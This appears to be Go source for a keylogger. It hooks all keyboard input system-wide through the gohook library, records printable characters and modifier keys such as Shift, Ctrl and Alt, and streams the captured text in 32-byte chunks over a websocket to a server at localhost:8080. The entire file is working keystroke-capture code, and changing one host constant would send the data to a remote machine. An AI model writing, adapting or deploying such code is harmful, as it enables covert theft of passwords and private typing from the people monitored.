package main

import (
	"fmt"
	"net/url"
	"os"

	"github.com/gorilla/websocket"
	hook "github.com/robotn/gohook"
)

const (
	SHIFT_RAWCODE = 65505
	CTRL_RAWCODE  = 65507
	ALT_RAWCODE   = 65513
	DEL_KEYCHAR   = 8
	ENTER_KEYCHAR = 13
	REG_START     = 32
	REG_END       = 255
)

const HOST = "localhost:8080"

var u = url.URL{Scheme: "ws", Host: HOST, Path: "/keys"}

func main() {
	var conn *websocket.Conn
	var err error
	var tries = 0
	for {
		conn, _, err = websocket.DefaultDialer.Dial(u.String(), nil)
		if err != nil {
			fmt.Printf("conn err %v\n", err)
			tries += 1
			if tries >= 3 {
				fmt.Printf("returning")
				return
			}
		} else {
			fmt.Printf("breaking")
			break
		}
	}
	defer conn.Close()

	go func() {
		defer os.Exit(0)
		for {
			kind, _, err := conn.ReadMessage()
			if err != nil {
				fmt.Printf("got read err %v\n", err)
				return
			}
			if kind == websocket.CloseMessage {
				fmt.Printf("got close message")
				return
			}
		}
	}()

	evChan := hook.Start()
	defer hook.End()
	buff := make([]byte, 64)

	for ev := range evChan {
		switch ev.Rawcode {
		case SHIFT_RAWCODE:
			if ev.Kind == hook.KeyDown {
				buff = append(buff, []byte("[SHIFT]")...)
			} else if ev.Kind == hook.KeyUp {
				buff = append(buff, []byte("[shift]")...)
			}
			continue

		case CTRL_RAWCODE:
			if ev.Kind == hook.KeyDown {
				buff = append(buff, []byte("[CTRL]")...)
			} else if ev.Kind == hook.KeyUp {
				buff = append(buff, []byte("[ctrl]")...)
			}
			continue

		case ALT_RAWCODE:
			if ev.Kind == hook.KeyDown {
				buff = append(buff, []byte("[ALT]")...)
			} else if ev.Kind == hook.KeyUp {
				buff = append(buff, []byte("[alt]")...)
			}
			continue

		case DEL_KEYCHAR:
			if ev.Kind == hook.KeyDown {
				buff = append(buff, []byte("[DEL]")...)
			}
			continue
		}

		switch ev.Keychar {
		case DEL_KEYCHAR:
			if ev.Kind == hook.KeyDown {
				buff = append(buff, []byte("[DEL]")...)
			}
			continue

		case ENTER_KEYCHAR:
			if ev.Kind == hook.KeyDown {
				fmt.Printf("A")
				buff = append(buff, []byte("\n")...)
			}
			continue
		}

		if REG_START <= ev.Keychar && ev.Keychar <= REG_END {
			if ev.Kind == hook.KeyDown {
				buff = append(buff, byte(ev.Keychar))
			}
		}

		if len(buff) >= 32 {
			conn.WriteMessage(websocket.TextMessage, buff[:32])
			buff = buff[32:]
		}
	}
}
